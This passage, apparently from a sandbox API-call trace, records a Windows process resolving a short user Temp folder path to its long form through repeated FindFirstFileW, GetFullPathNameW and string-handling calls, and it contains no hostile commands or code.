nFileSizeLow=0xb0c08c, dwReserved0=0x6ef404, dwReserved1=0x4a, cFileName="ᣘ\x1fnP", cAlternateFileName="쀴°삌°J")) returned 0xffffffff [0065.459] GetLastError () returned 0x2 [0065.459] SysReAllocStringLen (in: pbstr=0x6ef384*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x6ef384*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 1 [0065.459] SysReAllocStringLen (in: pbstr=0x6ef608*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", len=0x24 | out: pbstr=0x6ef608*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0065.459] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x6eee94, lpFilePart=0x6eee90 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpFilePart=0x6eee90*="Temp") returned 0x24 [0065.459] SysReAllocStringLen (in: pbstr=0x6ef0d4*=0x0, psz="C:", len=0x2 | out: pbstr=0x6ef0d4*="C:") returned 1 [0065.459] SysReAllocStringLen (in: pbstr=0x6ef090*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6ef090*="C:\\") returned 1 [0065.460] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.460] SysReAllocStringLen (in: pbstr=0x6ef08c*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x6ef08c*="C:\\Users\\5P5NRG~1\\AppData\\Local\\") returned 1 [0065.460] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\5p5nrg~1\\appdata\\local\\") returned 0x20 [0065.460] SetLastError (dwErrCode=0x0) [0065.460] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0065.460] GetLastError () returned 0x0 [0065.460] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\", lpFindFileData=0x6ef0f8 | out: lpFindFileData=0x6ef0f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x6ef118, ftLastAccessTime.dwLowDateTime=0x76e44557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0xb0c0e4, ftLastWriteTime.dwHighDateTime=0x6ef130, nFileSizeHigh=0x76e44628, nFileSizeLow=0xb0c0e4, dwReserved0=0x6ef14c, dwReserved1=0x4a, cFileName="\x15", cAlternateFileName="센°쇬°H")) returned 0xffffffff [0065.460] GetLastError () returned 0x2 [0065.460] SysReAllocStringLen (in: pbstr=0x6ef0cc*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x6ef0cc*="C:\\Users\\5P5NRG~1\\AppData\\Local\\") returned 1 [0065.460] SysReAllocStringLen (in: pbstr=0x6ef350*="C:\\Users\\5P5NRG~1\\AppData\\Local\\", psz="C:\\Users\\5P5NRG~1\\AppData\\Local", len=0x1f | out: pbstr=0x6ef350*="C:\\Users\\5P5NRG~1\\AppData\\Local") returned 1 [0065.460] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x6eebdc, lpFilePart=0x6eebd8 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local", lpFilePart=0x6eebd8*="Local") returned 0x1f [0065.461] SysReAllocStringLen (in: pbstr=0x6eee1c*=0x0, psz="C:", len=0x2 | out: pbstr=0x6eee1c*="C:") returned 1 [0065.461] SysReAllocStringLen (in: pbstr=0x6eedd8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6eedd8*="C:\\") returned 1 [0065.461] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.461] SysReAllocStringLen (in: pbstr=0x6eedd4*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\", len=0x1a | out: pbstr=0x6eedd4*="C:\\Users\\5P5NRG~1\\AppData\\") returned 1 [0065.461] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\5p5nrg~1\\appdata\\") returned 0x1a [0065.461] SetLastError (dwErrCode=0x0) [0065.461] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0065.461] GetLastError () returned 0x0 [0065.461] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\", lpFindFileData=0x6eee40 | out: lpFindFileData=0x6eee40*(dwFileAttributes=0x6eee58, ftCreationTime.dwLowDateTime=0x76e443cd, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x15, ftLastAccessTime.dwHighDateTime=0x48, ftLastWriteTime.dwLowDateTime=0xb0c194, ftLastWriteTime.dwHighDateTime=0x6eee78, nFileSizeHigh=0x76e44628, nFileSizeLow=0xb0c194, dwReserved0=0x6eee94, dwReserved1=0x48, cFileName="\x02", cAlternateFileName="쉄°싴°>")) returned 0xffffffff [0065.461] GetLastError () returned 0x2 [0065.461] SysReAllocStringLen (in: pbstr=0x6eee14*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\", len=0x1a | out: pbstr=0x6eee14*="C:\\Users\\5P5NRG~1\\AppData\\") returned 1 [0065.461] SysReAllocStringLen (in: pbstr=0x6ef098*="C:\\Users\\5P5NRG~1\\AppData\\", psz="C:\\Users\\5P5NRG~1\\AppData", len=0x19 | out: pbstr=0x6ef098*="C:\\Users\\5P5NRG~1\\AppData") returned 1 [0065.461] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData", nBufferLength=0x104, lpBuffer=0x6ee924, lpFilePart=0x6ee920 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData", lpFilePart=0x6ee920*="AppData") returned 0x19 [0065.461] SysReAllocStringLen (in: pbstr=0x6eeb64*=0x0, psz="C:", len=0x2 | out: pbstr=0x6eeb64*="C:") returned 1 [0065.461] SysReAllocStringLen (in: pbstr=0x6eeb20*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6eeb20*="C:\\") returned 1 [0065.462] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.462] SysReAllocStringLen (in: pbstr=0x6eeb1c*=0x0, psz="C:\\Users\\5P5NRG~1\\", len=0x12 | out: pbstr=0x6eeb1c*="C:\\Users\\5P5NRG~1\\") returned 1 [0065.462] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\", cchLength=0x12 | out: lpsz="c:\\users\\5p5nrg~1\\") returned 0x12 [0065.462] SetLastError (dwErrCode=0x0) [0065.462] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0065.462] GetLastError () returned 0x0 [0065.462] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\", lpFindFileData=0x6eeb88 | out: lpFindFileData=0x6eeb88*(dwFileAttributes=0x6eed14, ftCreationTime.dwLowDateTime=0x77cb1ecd, ftCreationTime.dwHighDateTime=0x130264, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77c6e36c, ftLastWriteTime.dwLowDateTime=0x77c6e0d2, ftLastWriteTime.dwHighDateTime=0xaf0000, nFileSizeHigh=0x40, nFileSizeLow=0xb07648, dwReserved0=0x6eebdc, dwReserved1=0x3e, cFileName="\x02", cAlternateFileName="眬°盤°2")) returned 0xffffffff [0065.462] GetLastError () returned 0x2 [0065.462] SysReAllocStringLen (in: pbstr=0x6eeb5c*=0x0, psz="C:\\Users\\5P5NRG~1\\", len=0x12 | out: pbstr=0x6eeb5c*="C:\\Users\\5P5NRG~1\\") returned 1 [0065.462] SysReAllocStringLen (in: pbstr=0x6eede0*="C:\\Users\\5P5NRG~1\\", psz="C:\\Users\\5P5NRG~1", len=0x11 | out: pbstr=0x6eede0*="C:\\Users\\5P5NRG~1") returned 1 [0065.462] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1", nBufferLength=0x104, lpBuffer=0x6ee66c, lpFilePart=0x6ee668 | out: lpBuffer="C:\\Users\\5P5NRG~1", lpFilePart=0x6ee668*="5P5NRG~1") returned 0x11 [0065.462] SysReAllocStringLen (in: pbstr=0x6ee8ac*=0x0, psz="C:", len=0x2 | out: pbstr=0x6ee8ac*="C:") returned 1 [0065.462] SysReAllocStringLen (in: pbstr=0x6ee868*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6ee868*="C:\\") returned 1 [0065.462] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.462] SysReAllocStringLen (in: pbstr=0x6ee864*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x6ee864*="C:\\Users\\") returned 1 [0065.462] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0065.462] SetLastError (dwErrCode=0x0) [0065.462] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0065.462] GetLastError () returned 0x0 [0065.463] FindFirstFileW (in: lpFileName="C:\\Users\\", lpFindFileData=0x6ee8d0 | out: lpFindFileData=0x6ee8d0*(dwFileAttributes=0x6eea5c, ftCreationTime.dwLowDateTime=0x77cb1ecd, ftCreationTime.dwHighDateTime=0x130264, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77c6e36c, ftLastWriteTime.dwLowDateTime=0x77c6e0d2, ftLastWriteTime.dwHighDateTime=0xaf0000, nFileSizeHigh=0x30, nFileSizeLow=0xb0ac50, dwReserved0=0x6ee924, dwReserved1=0x32, cFileName="\x02", cAlternateFileName="괄°겔°\"")) returned 0xffffffff [0065.463] GetLastError () returned 0x2 [0065.463] SysReAllocStringLen (in: pbstr=0x6ee8a4*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x6ee8a4*="C:\\Users\\") returned 1 [0065.463] SysReAllocStringLen (in: pbstr=0x6eeb28*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x6eeb28*="C:\\Users") returned 1 [0065.463] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x6ee3b4, lpFilePart=0x6ee3b0 | out: lpBuffer="C:\\Users", lpFilePart=0x6ee3b0*="Users") returned 0x8 [0065.463] SysReAllocStringLen (in: pbstr=0x6ee5f4*=0x0, psz="C:", len=0x2 | out: pbstr=0x6ee5f4*="C:") returned 1 [0065.463] SysReAllocStringLen (in: pbstr=0x6ee5b0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6ee5b0*="C:\\") returned 1 [0065.463] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.463] SysReAllocStringLen (in: pbstr=0x6ee5ac*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6ee5ac*="C:\\") returned 1 [0065.463] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.463] SetLastError (dwErrCode=0x0) [0065.463] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0065.463] GetLastError () returned 0x0 [0065.463] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x6ee618 | out: lpFindFileData=0x6ee618*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x77c73ca3, cFileName="Users", cAlternateFileName="")) returned 0xb0c748 [0065.464] FileTimeToLocalFileTime (in: lpFileTime=0x6ee62c, lpLocalFileTime=0x6ee59c | out: lpLocalFileTime=0x6ee59c) returned 1 [0065.464] FileTimeToDosDateTime (in: lpFileTime=0x6ee59c, lpFatDate=0x6ee5fa, lpFatTime=0x6ee5f8 | out: lpFatDate=0x6ee5fa, lpFatTime=0x6ee5f8) returned 1 [0065.464] FindClose (in: hFindFile=0xb0c748 | out: hFindFile=0xb0c748) returned 1 [0065.464] SysReAllocStringLen (in: pbstr=0x6eeb28*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x6eeb28*="C:\\Users") returned 1 [0065.464] SysReAllocStringLen (in: pbstr=0x6ee89c*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x6ee89c*="C:\\Users") returned 1 [0065.464] SysReAllocStringLen (in: pbstr=0x6eeb28*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x6eeb28*="C:\\Users\\") returned 1 [0065.464] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1", lpFindFileData=0x6ee8d0 | out: lpFindFileData=0x6ee8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ee924, dwReserved1=0x32, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0xb0c748 [0065.464] FileTimeToLocalFileTime (in: lpFileTime=0x6ee8e4, lpLocalFileTime=0x6ee854 | out: lpLocalFileTime=0x6ee854) returned 1 [0065.464] FileTimeToDosDateTime (in: lpFileTime=0x6ee854, lpFatDate=0x6ee8b2, lpFatTime=0x6ee8b0 | out: lpFatDate=0x6ee8b2, lpFatTime=0x6ee8b0) returned 1 [0065.464] FindClose (in: hFindFile=0xb0c748 | out: hFindFile=0xb0c748) returned 1 [0065.465] SysReAllocStringLen (in: pbstr=0x6eede0*="C:\\Users\\5P5NRG~1", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz", len=0x1d | out: pbstr=0x6eede0*="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 1 [0065.465] SysReAllocStringLen (in: pbstr=0x6eeb54*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz", len=0x1d | out: pbstr=0x6eeb54*="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 1 [0065.465] SysReAllocStringLen (in: pbstr=0x6eede0*="C:\\Users\\5p5NrGJn0jS HALPmcxz", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", len=0x1e | out: pbstr=0x6eede0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 1 [0065.465] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFindFileData=0x6eeb88 | out: lpFindFileData=0x6eeb88*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6eebdc, dwReserved1=0x3e, cFileName="AppData", cAlternateFileName="")) returned 0xb0c850 [0065.465] FileTimeToLocalFileTime (in: lpFileTime=0x6eeb9c, lpLocalFileTime=0x6eeb0c | out: lpLocalFileTime=0x6eeb0c) returned 1 [0065.465] FileTimeToDosDateTime (in: lpFileTime=0x6eeb0c, lpFatDate=0x6eeb6a, lpFatTime=0x6eeb68 | out: lpFatDate=0x6eeb6a, lpFatTime=0x6eeb68) returned 1 [0065.465] FindClose (in: hFindFile=0xb0c850 | out: hFindFile=0xb0c850) returned 1 [0065.465] SysReAllocStringLen (in: pbstr=0x6ef098*="C:\\Users\\5P5NRG~1\\AppData", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", len=0x25 | out: pbstr=0x6ef098*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 1 [0065.465] SysReAllocStringLen (in: pbstr=0x6eee0c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", len=0x25 | out: pbstr=0x6eee0c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 1 [0065.466] SysReAllocStringLen (in: pbstr=0x6ef098*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", len=0x26 | out: pbstr=0x6ef098*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned 1 [0065.466] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFindFileData=0x6eee40 | out: lpFindFileData=0x6eee40*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6eee94, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0xb0c850 [0065.466] FileTimeToLocalFileTime (in: lpFileTime=0x6eee54, lpLocalFileTime=0x6eedc4 | out: lpLocalFileTime=0x6eedc4) returned 1 [0065.466] FileTimeToDosDateTime (in: lpFileTime=0x6eedc4, lpFatDate=0x6eee22, lpFatTime=0x6eee20 | out: lpFatDate=0x6eee22, lpFatTime=0x6eee20) returned 1 [0065.466] FindClose (in: hFindFile=0xb0c850 | out: hFindFile=0xb0c850) returned 1 [0065.466] SysReAllocStringLen (in: pbstr=0x6ef350*="C:\\Users\\5P5NRG~1\\AppData\\Local", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", len=0x2b | out: pbstr=0x6ef350*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0065.466] SysReAllocStringLen (in: pbstr=0x6ef0c4*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", len=0x2b | out: pbstr=0x6ef0c4*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0065.466] SysReAllocStringLen (in: pbstr=0x6ef350*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", len=0x2c | out: pbstr=0x6ef350*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\") returned 1 [0065.466] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", lpFindFileData=0x6ef0f8 | out: lpFindFileData=0x6ef0f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef68f060, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xef68f060, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ef14c, dwReserved1=0x4a, cFileName="Temp", cAlternateFileName="")) returned 0xb0c240 [0065.466] FileTimeToLocalFileTime (in: lpFileTime=0x6ef10c, lpLocalFileTime=0x6ef07c | out: lpLocalFileTime=0x6ef07c) returned 1 [0065.466] FileTimeToDosDateTime (in: lpFileTime=0x6ef07c, lpFatDate=0x6ef0da, lpFatTime=0x6ef0d8 | out: lpFatDate=0x6ef0da, lpFatTime=0x6ef0d8) returned 1 [0065.467] FindClose (in: hFindFile=0xb0c240 | out: hFindFile=0xb0c240) returned 1 [0065.467] SysReAllocStringLen (in: pbstr=0x6ef608*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", len=0x30 | out: pbstr=0x6ef608*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp") returned 1 [0065.467] SysReAllocStringLen (in: pbstr=0x6ef37c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", len=0x30 | out: pbstr=0x6ef37c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp") returned 1 [0065.467] SysReAllocStringLen (in: pbstr=0x6ef608*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", len=0x31 | out: pbstr=0x6ef608*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\") returned 1 [0065.467] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpFindFileData=0x6ef3b0 | out: lpFindFileData=0x6ef3b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x6ef3d0, ftLastAccessTime.dwLowDateTime=0x76e44557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0xb0c08c, ftLastWriteTime.dwHighDateTime=0x6ef3e8, nFileSizeHigh=0x76e44628, nFileSizeLow=0xb0c08c, dwReserved0=0x6ef404, dwReserved1=0x4a, cFileName="ᣘ\x1fnP", cAlternateFileName="쀴°삌°J")) returned 0xffffffff [0065.467] GetLastError () returned 0x2 [0065.467] SysReAllocStringLen (in: pbstr=0x6ef71c*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x6ef71c*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 1 [0065.467] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp")) returned 0x2010 [0065.468] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x6ef14c, lpFilePart=0x6ef148 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpFilePart=0x6ef148*="Temp") returned 0x24 [0065.468] SysReAllocStringLen (in: pbstr=0x6ef38c*=0x0, psz="C:", len=0x2 | out: pbstr=0x6ef38c*="C:") returned 1 [0065.468] SysReAllocStringLen (in: pbstr=0x6ef348*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6ef348*="C:\\") returned 1 [0065.468] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.468] SysReAllocStringLen (in: pbstr=0x6ef344*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x6ef344*="C:\\Users\\5P5NRG~1\\AppData\\Local\\") returned 1 [0065.468] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\5p5nrg~1\\appdata\\local\\") returned 0x20 [0065.468] SetLastError (dwErrCode=0x0) [0065.468] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0065.468] GetLastError () returned 0x0 [0065.468] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\", lpFindFileData=0x6ef3b0 | out: lpFindFileData=0x6ef3b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0065.468] GetLastError () returned 0x2 [0065.468] SysReAllocStringLen (in: pbstr=0x6ef384*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x6ef384*="C:\\Users\\5P5NRG~1\\AppData\\Local\\") returned 1 [0065.468] SysReAllocStringLen (in: pbstr=0x6ef608*="C:\\Users\\5P5NRG~1\\AppData\\Local\\", psz="C:\\Users\\5P5NRG~1\\AppData\\Local", len=0x1f | out: pbstr=0x6ef608*="C:\\Users\\5P5NRG~1\\AppData\\Local") returned 1 [0065.468] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x6eee94, lpFilePart=0x6eee90 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local", lpFilePart=0x6eee90*="Local") returned 0x1f [0065.469] SysReAllocStringLen (in: pbstr=0x6ef0d4*=0x0, psz="C:", len=0x2 | out: pbstr=0x6ef0d4*="C:") returned 1 [0065.469] SysReAllocStringLen (in: pbstr=0x6ef090*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6ef090*="C:\\") returned 1 [0065.469] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.469] SysReAllocStringLen (in: pbstr=0x6ef08c*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\", len=0x1a | out: pbstr=0x6ef08c*="C:\\Users\\5P5NRG~1\\AppData\\") returned 1 [0065.469] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\5p5nrg~1\\appdata\\") returned 0x1a [0065.469] SetLastError (dwErrCode=0x0) [0065.469] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0065.469] GetLastError () returned 0x0 [0065.469] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\", lpFindFileData=0x6ef0f8 | out: lpFindFileData=0x6ef0f8*(dwFileAttributes=0x6ef110, ftCreationTime.dwLowDateTime=0x76e443cd, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x15, ftLastAccessTime.dwHighDateTime=0x48, ftLastWriteTime.dwLowDateTime=0xb0c864, ftLastWriteTime.dwHighDateTime=0x6ef130, nFileSizeHigh=0x76e44628, nFileSizeLow=0xb0c864, dwReserved0=0x6ef14c, dwReserved1=0x48, cFileName="\x15", cAlternateFileName="쫤°쟼°>")) returned 0xffffffff [0065.469] GetLastError () returned 0x2 [0065.469] SysReAllocStringLen (in: pbstr=0x6ef0cc*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\", len=0x1a | out: pbstr=0x6ef0cc*="C:\\Users\\5P5NRG~1\\AppData\\") returned 1 [0065.469] SysReAllocStringLen (in: pbstr=0x6ef350*="C:\\Users\\5P5NRG~1\\AppData\\", psz="C:\\Users\\5P5NRG~1\\AppData", len=0x19 | out: pbstr=0x6ef350*="C:\\Users\\5P5NRG~1\\AppData") returned 1 [0065.469] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData", nBufferLength=0x104, lpBuffer=0x6eebdc, lpFilePart=0x6eebd8 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData", lpFilePart=0x6eebd8*="AppData") returned 0x19 [0065.469] SysReAllocStringLen (in: pbstr=0x6eee1c*=0x0, psz="C:", len=0x2 | out: pbstr=0x6eee1c*="C:") returned 1 [0065.469] SysReAllocStringLen (in: pbstr=0x6eedd8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6eedd8*="C:\\") returned 1 [0065.469] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.469] SysReAllocStringLen (in: pbstr=0x6eedd4*=0x0, psz="C:\\Users\\5P5NRG~1\\", len=0x12 | out: pbstr=0x6eedd4*="C:\\Users\\5P5NRG~1\\") returned 1 [0065.469] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\", cchLength=0x12 | out: lpsz="c:\\users\\5p5nrg~1\\") returned 0x12 [0065.470] SetLastError (dwErrCode=0x0) [0065.470] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\", cchCount1=18, lpString2="c:\\", 